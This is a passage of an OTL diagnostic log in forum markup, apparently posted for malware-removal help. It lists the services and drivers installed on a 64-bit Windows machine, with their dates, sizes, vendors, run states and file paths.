SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Stopped] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Stopped] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Stopped] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
